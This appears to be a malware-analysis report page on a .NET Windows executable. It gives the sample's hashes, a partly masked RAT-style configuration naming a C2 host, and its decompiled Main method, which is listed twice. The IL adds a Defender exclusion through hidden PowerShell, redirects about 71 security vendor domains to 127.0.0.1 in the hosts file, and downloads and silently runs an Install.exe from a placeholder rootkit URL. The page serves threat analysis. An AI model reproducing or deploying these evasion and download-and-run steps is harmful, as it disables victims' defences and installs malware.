Malicious
Malicious

b0aa5b2850e7ccb9d79fb2d3ec351a9f

Share on LinkedIn
Print
PE Executable
MD5: b0aa5b2850e7ccb9d79fb2d3ec351a9f
Size: 422.91 KB
application/x-dosexec
Ctrl + scroll to zoom · drag to pan

Get an AI-generated breakdown of this malware's behaviour, IOCs and recommendations.

AI analysis is available with Essential.
Unlock with Essential
Symbol Obfuscation Score High
MD5 b0aa5b2850e7ccb9d79fb2d3ec351a9f
Sha1 4e4a0dffc782a9fbece9de231413800495cca3ac
Sha256 a63cffc78eea1c004b2e56ef5ae6573662376b5c6ec8ebbaef27cac7344fc743
Sha384 ffcad5be64c5459fbe268769454edb7f4344b1e731f7329b8541a383da3e30bcda60d3e8f7c07dfc93d4cddbea6a4ea4
Sha512 a0c15dbb4987679d7b014f734f1204bd2487c683bd9665ca8d428419b0f13f097d3059ab58ad07e00a484b74dc1b8da03fecfecc737b1b3990f25593c0ef7a7b
SSDeep 6144:6omEjkzQT1TVNJVnSzDBldIT0vP/Vnb0+uWNuEMFysW7YA2RWHd05sqlGQ:X1TVV1SdIQvPC8sW7N2RWHS+IGQ
TLSH DA947D1467E8965EE6EF07BEA4310E1187B0FC6A761AF387056C51BDAC173814F81BA3
PeID
.NET executableMicrosoft Visual C# / Basic .NETMicrosoft Visual C# / Basic.NET / MS Visual Basic 2005 - ASL Microsoft Visual C# v7.0 / Basic .NETMicrosoft Visual Studio .NET
Structure
DosHeader
PE Header
Optional Header (x86)
Section Headers
.text
.rsrc
.reloc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
xClient.Properties.Resources.resources
STICH beta Structural Threat Infection Chain Hash

A content-independent fingerprint of the infection method: successive formats, internal objects and MITRE techniques from the initial file to each final payload.

STICH Path = the fingerprint (canonical chain with techniques) STICH Shape = structure only Only determinant branches produce STICH Paths.
Path pe:exe>pe:rsrc>bin
Shape pe:exe>pe:rsrc>bin
malicious 3 nodes
Path pe:exe>bin
Shape pe:exe>bin
malicious 2 nodes
Config. Field Value
Conf. AES-Salt BF-EB-huhuhuhuhuhuhuhuhuhuhu
Conf. AES-Key mqTxiAhuhuhuhuhuhuhu
Version 3huhuhuhu
Port 4huhuhuhu
Host c2.ethhuhuhuhuhuhuhu
ReconnectDelay 3huhuhuhu
Key 1WvgEMhuhuhuhuhuhuhu
SubDirectory NcFtjbhuhuhuhuhuhuhuhuhuhuhu
InstallName Suhuhuhuhu
Install Clihuhuhuhu
Startup 1huhuhuhu
Mutex 1huhuhuhu
StartupKey $Sxr-qhuhuhuhuhuhuhu
HideFile windowhuhuhuhuhuhuhu
EnableLogger 1huhuhuhu
EncryptionKey 1huhuhuhu
We extracted this malware's full configuration (C2, credentials, campaign IDs…).
Unlock with Essential
Name Value
Info
PE Detect: PeReader OK (file layout)
Module Name
turingmachine.exe
Full Name
turingmachine.exe
EntryPoint
System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::Main(System.String[])
Scope Name
turingmachine.exe
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
turingmachine
Assembly Version
3.1.5.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.8
Total Strings
957
Main Method
System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::Main(System.String[])
Main IL Instruction Count
439
Main IL
call System.Void System.Windows.Forms.Application::EnableVisualStyles()
ldc.i4.0 <null>
call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean)
call System.AppDomain System.AppDomain::get_CurrentDomain()
ldnull <null>
ldftn System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::概ᐢ쮬췶뷴მ䣠䝾瀉ඓ쒇꯴겼ᖈ僄綖(System.Object,System.UnhandledExceptionEventArgs)
newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr)
callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler)
call System.Boolean  瘸盨㺑䬲嶭궪魐⬗错⭶墵⪩腆뢗憌::땇赪蟢橶鏃쀙쏍吟滨뉗洑ퟛ峼꾯ୁ붛鈶냥畽()
brfalse IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::庥䩭肬橪옖ফ䆣놥�辏ﱜ멎躺ュᩌሼ븜갿꼶()
brfalse.s IL_0043: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
call System.Boolean Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳::get_Exiting()
brtrue.s IL_0043: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
ldsfld Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::捖욘ᯓ읞ﶝn맾�ߎ�ᦃ䨣阿彨ፏ殁
callvirt System.Void Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳::ᢳ䗖药ୣ缑ᐴ鶣떖͕橚졠﹡慈氵䠗䮥浯顦㨓()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
brtrue.s IL_0054: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
call System.Void 퉣䑉滣띖೤㘞ℼ䖉㑐봩綸ቯ신实ㅌ첎嗇贶::볜얁㓢候෠ꧬ좰兂슎쎽ꋦ瀠﬛Ẽ㏢婣䯖෹()
br IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
brfalse IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
ldstr Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root
stloc.0 <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
stloc.s V_4
ldloc.s V_4
ldstr powershell.exe
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
ldloc.s V_4
ldstr -WindowStyle Hidden -Command "
ldloc.0 <null>
ldstr "
call System.String System.String::Concat(System.String,System.String,System.String)
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String)
ldloc.s V_4
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
ldloc.s V_4
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
ldloc.s V_4
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean)
newobj System.Void System.Diagnostics.Process::.ctor()
dup <null>
ldloc.s V_4
callvirt System.Void System.Diagnostics.Process::set_StartInfo(System.Diagnostics.ProcessStartInfo)
callvirt System.Boolean System.Diagnostics.Process::Start()
pop <null>
leave.s IL_00BE: ldc.i4.s 71
pop <null>
leave.s IL_00BE: ldc.i4.s 71
ldc.i4.s 71
newarr System.String
dup <null>
ldc.i4.0 <null>
ldstr 127.0.0.1 www.malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.1 <null>
ldstr 127.0.0.1 avast.com
stelem.ref <null>
dup <null>
ldc.i4.2 <null>
ldstr 127.0.0.1 www.avast.com
stelem.ref <null>
dup <null>
ldc.i4.3 <null>
ldstr 127.0.0.1 totalav.com
stelem.ref <null>
dup <null>
ldc.i4.4 <null>
ldstr 127.0.0.1 www.totalav.com
stelem.ref <null>
dup <null>
ldc.i4.5 <null>
ldstr 127.0.0.1 scanguard.com
stelem.ref <null>
dup <null>
ldc.i4.6 <null>
ldstr 127.0.0.1 www.scanguard.com
stelem.ref <null>
dup <null>
ldc.i4.7 <null>
ldstr 127.0.0.1 totaladblock.com
stelem.ref <null>
dup <null>
ldc.i4.8 <null>
ldstr 127.0.0.1 www.totaladblock.com
stelem.ref <null>
dup <null>
ldc.i4.s 9
ldstr 127.0.0.1 pcprotect.com
stelem.ref <null>
dup <null>
ldc.i4.s 10
ldstr 127.0.0.1 www.pcprotect.com
stelem.ref <null>
dup <null>
ldc.i4.s 11
ldstr 127.0.0.1 mcafee.com
stelem.ref <null>
dup <null>
ldc.i4.s 12
ldstr 127.0.0.1 www.mcafee.com
stelem.ref <null>
dup <null>
ldc.i4.s 13
ldstr 127.0.0.1 bitdefender.com
stelem.ref <null>
dup <null>
ldc.i4.s 14
ldstr 127.0.0.1 www.bitdefender.com
stelem.ref <null>
dup <null>
ldc.i4.s 15
ldstr 127.0.0.1 us.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 16
ldstr 127.0.0.1 www.us.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 17
ldstr 127.0.0.1 avg.com
stelem.ref <null>
dup <null>
ldc.i4.s 18
ldstr 127.0.0.1 www.avg.com
stelem.ref <null>
dup <null>
ldc.i4.s 19
ldstr 127.0.0.1 malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.s 20
ldstr 127.0.0.1 www.malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.s 21
ldstr 127.0.0.1 pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 22
ldstr 127.0.0.1 www.pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 23
ldstr 127.0.0.1 surfshark.com
stelem.ref <null>
dup <null>
ldc.i4.s 24
ldstr 127.0.0.1 www.surfshark.com
stelem.ref <null>
dup <null>
ldc.i4.s 25
ldstr 127.0.0.1 avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 26
ldstr 127.0.0.1 www.avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 27
ldstr 127.0.0.1 norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 28
ldstr 127.0.0.1 www.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 29
ldstr 127.0.0.1 eset.com
stelem.ref <null>
dup <null>
ldc.i4.s 30
ldstr 127.0.0.1 www.eset.com
stelem.ref <null>
dup <null>
ldc.i4.s 31
ldstr 127.0.0.1 microsoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 32
ldstr 127.0.0.1 www.microsoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 33
ldstr 127.0.0.1 Zillya.com
stelem.ref <null>
dup <null>
ldc.i4.s 34
ldstr 127.0.0.1 www.Zillya.com
stelem.ref <null>
dup <null>
ldc.i4.s 35
ldstr 127.0.0.1 kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 36
ldstr 127.0.0.1 www.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 37
ldstr 127.0.0.1 usa.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 38
ldstr 127.0.0.1 www.usa.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 39
ldstr 127.0.0.1 dpbolvw.net
stelem.ref <null>
dup <null>
ldc.i4.s 40
ldstr 127.0.0.1 www.dpbolvw.net
stelem.ref <null>
dup <null>
ldc.i4.s 41
ldstr 127.0.0.1 sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 42
ldstr 127.0.0.1 www.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 43
ldstr 127.0.0.1 home.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 44
ldstr 127.0.0.1 www.home.sophos.com
stelem.ref <null>
dup <null>
ldc.i4.s 45
ldstr 127.0.0.1 adaware.com
stelem.ref <null>
dup <null>
ldc.i4.s 46
ldstr 127.0.0.1 www.adaware.com
stelem.ref <null>
dup <null>
ldc.i4.s 47
ldstr 127.0.0.1 ahnlab.com
stelem.ref <null>
dup <null>
ldc.i4.s 48
ldstr 127.0.0.1 www.ahnlab.com
stelem.ref <null>
dup <null>
ldc.i4.s 49
ldstr 127.0.0.1 avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 50
ldstr 127.0.0.1 www.avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 51
ldstr 127.0.0.1 bullguard.com
stelem.ref <null>
dup <null>
ldc.i4.s 52
ldstr 127.0.0.1 www.bullguard.com
stelem.ref <null>
dup <null>
ldc.i4.s 53
ldstr 127.0.0.1 clamav.net
stelem.ref <null>
dup <null>
ldc.i4.s 54
ldstr 127.0.0.1 www.clamav.net
stelem.ref <null>
dup <null>
ldc.i4.s 55
ldstr 127.0.0.1 drweb.com
stelem.ref <null>
dup <null>
ldc.i4.s 56
ldstr 127.0.0.1 www.drweb.com
stelem.ref <null>
dup <null>
ldc.i4.s 57
ldstr 127.0.0.1 emsisoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 58
ldstr 127.0.0.1 www.emsisoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 59
ldstr 127.0.0.1 f-secure.com
stelem.ref <null>
dup <null>
ldc.i4.s 60
ldstr 127.0.0.1 www.f-secure.com
stelem.ref <null>
dup <null>
ldc.i4.s 61
ldstr 127.0.0.1 pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 62
ldstr 127.0.0.1 www.pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 63
ldstr 127.0.0.1 zonealarm.com
stelem.ref <null>
dup <null>
ldc.i4.s 64
ldstr 127.0.0.1 www.zonealarm.com
stelem.ref <null>
dup <null>
ldc.i4.s 65
ldstr 127.0.0.1 trendmicro.com
stelem.ref <null>
dup <null>
ldc.i4.s 66
ldstr 127.0.0.1 www.trendmicro.com
stelem.ref <null>
dup <null>
ldc.i4.s 67
ldstr 127.0.0.1 ccleaner.com
stelem.ref <null>
dup <null>
ldc.i4.s 68
ldstr 127.0.0.1 www.ccleaner.com
stelem.ref <null>
dup <null>
ldc.i4.s 69
ldstr 127.0.0.1 virustotal.com
stelem.ref <null>
dup <null>
ldc.i4.s 70
ldstr 127.0.0.1 www.virustotal.com
stelem.ref <null>
stloc.1 <null>
ldc.i4.s 37
call System.String System.Environment::GetFolderPath(System.Environment/SpecialFolder)
ldstr drivers\etc\hosts
call System.String System.IO.Path::Combine(System.String,System.String)
call System.IO.StreamWriter System.IO.File::AppendText(System.String)
stloc.s V_5
ldloc.1 <null>
stloc.s V_6
ldc.i4.0 <null>
stloc.s V_7
br.s IL_0372: ldloc.s V_7
ldloc.s V_6
ldloc.s V_7
ldelem.ref <null>
stloc.s V_8
ldloc.s V_5
ldloc.s V_8
callvirt System.Void System.IO.TextWriter::WriteLine(System.String)
ldloc.s V_7
ldc.i4.1 <null>
add <null>
stloc.s V_7
ldloc.s V_7
ldloc.s V_6
ldlen <null>
conv.i4 <null>
blt.s IL_035C: ldloc.s V_6
leave.s IL_0388: ldstr "ipconfig"
ldloc.s V_5
brfalse.s IL_0387: endfinally
ldloc.s V_5
callvirt System.Void System.IDisposable::Dispose()
endfinally <null>
ldstr ipconfig
ldstr /flushdns
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
dup <null>
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo)
dup <null>
brtrue.s IL_03B0: call System.Void System.Diagnostics.Process::WaitForExit()
pop <null>
br.s IL_03B5: leave.s IL_03BA
call System.Void System.Diagnostics.Process::WaitForExit()
leave.s IL_03BA: ldstr "ROOTKIT FILE URL HERE"
pop <null>
leave.s IL_03BA: ldstr "ROOTKIT FILE URL HERE"
ldstr ROOTKIT FILE URL HERE
stloc.2 <null>
call System.String System.IO.Path::GetTempPath()
ldstr Install.exe
call System.String System.IO.Path::Combine(System.String,System.String)
stloc.3 <null>
newobj System.Void System.Net.WebClient::.ctor()
stloc.s V_10
ldloc.s V_10
ldloc.2 <null>
ldloc.3 <null>
callvirt System.Void System.Net.WebClient::DownloadFile(System.String,System.String)
leave.s IL_03EE: newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
ldloc.s V_10
brfalse.s IL_03ED: endfinally
ldloc.s V_10
callvirt System.Void System.IDisposable::Dispose()
endfinally <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
stloc.s V_9
ldloc.s V_9
ldloc.3 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_WindowStyle(System.Diagnostics.ProcessWindowStyle)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
ldloc.s V_9
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
ldloc.s V_9
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean)
newobj System.Void System.Diagnostics.Process::.ctor()
dup <null>
ldloc.s V_9
callvirt System.Void System.Diagnostics.Process::set_StartInfo(System.Diagnostics.ProcessStartInfo)
callvirt System.Boolean System.Diagnostics.Process::Start()
pop <null>
leave.s IL_0435: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
pop <null>
leave.s IL_0435: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::賕턉䖺籾奼볆㯺ᒓ荓믏⿠㥥ꥧ�ᒬ笺彇()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::퍸ᅤꋲ쉹窷趝㶤㝊䑩៩�싕쀎촅욘俛ᮓ爎�()
ret <null>
Module Name
turingmachine.exe
Full Name
turingmachine.exe
EntryPoint
System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::Main(System.String[])
Scope Name
turingmachine.exe
Scope Type
ModuleDef
Kind
Windows
Runtime Version
v4.0.30319
Tables Header Version
512
WinMD Version
<null>
Assembly Name
turingmachine
Assembly Version
3.1.5.0
Assembly Culture
<null>
Has PublicKey
False
PublicKey Token
<null>
Target Framework
.NETFramework,Version=v4.8
Total Strings
957
Main Method
System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::Main(System.String[])
Main IL Instruction Count
439
Main IL
call System.Void System.Windows.Forms.Application::EnableVisualStyles()
ldc.i4.0 <null>
call System.Void System.Windows.Forms.Application::SetCompatibleTextRenderingDefault(System.Boolean)
call System.AppDomain System.AppDomain::get_CurrentDomain()
ldnull <null>
ldftn System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::概ᐢ쮬췶뷴მ䣠䝾瀉ඓ쒇꯴겼ᖈ僄綖(System.Object,System.UnhandledExceptionEventArgs)
newobj System.Void System.UnhandledExceptionEventHandler::.ctor(System.Object,System.IntPtr)
callvirt System.Void System.AppDomain::add_UnhandledException(System.UnhandledExceptionEventHandler)
call System.Boolean  瘸盨㺑䬲嶭궪魐⬗错⭶墵⪩腆뢗憌::땇赪蟢橶鏃쀙쏍吟滨뉗洑ퟛ峼꾯ୁ붛鈶냥畽()
brfalse IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::庥䩭肬橪옖ফ䆣놥�辏ﱜ멎躺ュᩌሼ븜갿꼶()
brfalse.s IL_0043: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
call System.Boolean Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳::get_Exiting()
brtrue.s IL_0043: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
ldsfld Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::捖욘ᯓ읞ﶝn맾�ߎ�ᦃ䨣阿彨ፏ殁
callvirt System.Void Ἅ讎ꛦᛩ沕蓖ᗈ≦ऽꬹࢰㄦ倡㊻ح⣨三텳::ᢳ䗖药ୣ缑ᐴ鶣떖͕橚졠﹡慈氵䠗䮥浯顦㨓()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
brtrue.s IL_0054: call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
call System.Void 퉣䑉滣띖೤㘞ℼ䖉㑐봩綸ቯ신实ㅌ첎嗇贶::볜얁㓢候෠ꧬ좰兂슎쎽ꋦ瀠﬛Ẽ㏢婣䯖෹()
br IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
call System.Boolean 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::恔㚎ꝙ焵๼ᑤ벦♛墛詿ᓥ뷁퀐Ꚍ膪봯꿻()
brfalse IL_043A: call System.Void 齥㋇棨뗎䃨鴣鵝鬲缊↾誻�᪶洺༙䈱ꚃﰭ砈诇::᥈즏衛ⳛ讕缢�諈崄쟸买ᥤ௱熾옡()
ldstr Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root
stloc.0 <null>
newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor()
stloc.s V_4
ldloc.s V_4
ldstr powershell.exe
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_FileName(System.String)
ldloc.s V_4
ldstr -WindowStyle Hidden -Command "
ldloc.0 <null>
ldstr "
call System.String System.String::Concat(System.String,System.String,System.String)
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_Arguments(System.String)
ldloc.s V_4
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean)
ldloc.s V_4
ldc.i4.0 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean)
ldloc.s V_4
ldc.i4.1 <null>
callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean)
newobj System.Void System.Diagnostics.Process::.ctor()
dup <null>
ldloc.s V_4
callvirt System.Void System.Diagnostics.Process::set_StartInfo(System.Diagnostics.ProcessStartInfo)
callvirt System.Boolean System.Diagnostics.Process::Start()
pop <null>
leave.s IL_00BE: ldc.i4.s 71
pop <null>
leave.s IL_00BE: ldc.i4.s 71
ldc.i4.s 71
newarr System.String
dup <null>
ldc.i4.0 <null>
ldstr 127.0.0.1 www.malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.1 <null>
ldstr 127.0.0.1 avast.com
stelem.ref <null>
dup <null>
ldc.i4.2 <null>
ldstr 127.0.0.1 www.avast.com
stelem.ref <null>
dup <null>
ldc.i4.3 <null>
ldstr 127.0.0.1 totalav.com
stelem.ref <null>
dup <null>
ldc.i4.4 <null>
ldstr 127.0.0.1 www.totalav.com
stelem.ref <null>
dup <null>
ldc.i4.5 <null>
ldstr 127.0.0.1 scanguard.com
stelem.ref <null>
dup <null>
ldc.i4.6 <null>
ldstr 127.0.0.1 www.scanguard.com
stelem.ref <null>
dup <null>
ldc.i4.7 <null>
ldstr 127.0.0.1 totaladblock.com
stelem.ref <null>
dup <null>
ldc.i4.8 <null>
ldstr 127.0.0.1 www.totaladblock.com
stelem.ref <null>
dup <null>
ldc.i4.s 9
ldstr 127.0.0.1 pcprotect.com
stelem.ref <null>
dup <null>
ldc.i4.s 10
ldstr 127.0.0.1 www.pcprotect.com
stelem.ref <null>
dup <null>
ldc.i4.s 11
ldstr 127.0.0.1 mcafee.com
stelem.ref <null>
dup <null>
ldc.i4.s 12
ldstr 127.0.0.1 www.mcafee.com
stelem.ref <null>
dup <null>
ldc.i4.s 13
ldstr 127.0.0.1 bitdefender.com
stelem.ref <null>
dup <null>
ldc.i4.s 14
ldstr 127.0.0.1 www.bitdefender.com
stelem.ref <null>
dup <null>
ldc.i4.s 15
ldstr 127.0.0.1 us.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 16
ldstr 127.0.0.1 www.us.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 17
ldstr 127.0.0.1 avg.com
stelem.ref <null>
dup <null>
ldc.i4.s 18
ldstr 127.0.0.1 www.avg.com
stelem.ref <null>
dup <null>
ldc.i4.s 19
ldstr 127.0.0.1 malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.s 20
ldstr 127.0.0.1 www.malwarebytes.com
stelem.ref <null>
dup <null>
ldc.i4.s 21
ldstr 127.0.0.1 pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 22
ldstr 127.0.0.1 www.pandasecurity.com
stelem.ref <null>
dup <null>
ldc.i4.s 23
ldstr 127.0.0.1 surfshark.com
stelem.ref <null>
dup <null>
ldc.i4.s 24
ldstr 127.0.0.1 www.surfshark.com
stelem.ref <null>
dup <null>
ldc.i4.s 25
ldstr 127.0.0.1 avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 26
ldstr 127.0.0.1 www.avira.com
stelem.ref <null>
dup <null>
ldc.i4.s 27
ldstr 127.0.0.1 norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 28
ldstr 127.0.0.1 www.norton.com
stelem.ref <null>
dup <null>
ldc.i4.s 29
ldstr 127.0.0.1 eset.com
stelem.ref <null>
dup <null>
ldc.i4.s 30
ldstr 127.0.0.1 www.eset.com
stelem.ref <null>
dup <null>
ldc.i4.s 31
ldstr 127.0.0.1 microsoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 32
ldstr 127.0.0.1 www.microsoft.com
stelem.ref <null>
dup <null>
ldc.i4.s 33
ldstr 127.0.0.1 Zillya.com
stelem.ref <null>
dup <null>
ldc.i4.s 34
ldstr 127.0.0.1 www.Zillya.com
stelem.ref <null>
dup <null>
ldc.i4.s 35
ldstr 127.0.0.1 kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 36
ldstr 127.0.0.1 www.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 37
ldstr 127.0.0.1 usa.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 38
ldstr 127.0.0.1 www.usa.kaspersky.com
stelem.ref <null>
dup <null>
ldc.i4.s 39
ldstr 127.0.0.1 dpbolvw.net
stelem.ref <null>
dup <null>
ldc.i4.s 40
ldstr 127.0.0.1 www.dpbolvw.net
stelem.ref <null>
dup <null>
ldc.i4.s 41
ldstr 127.0.0.1 sophos.com
stelem.ref <null>
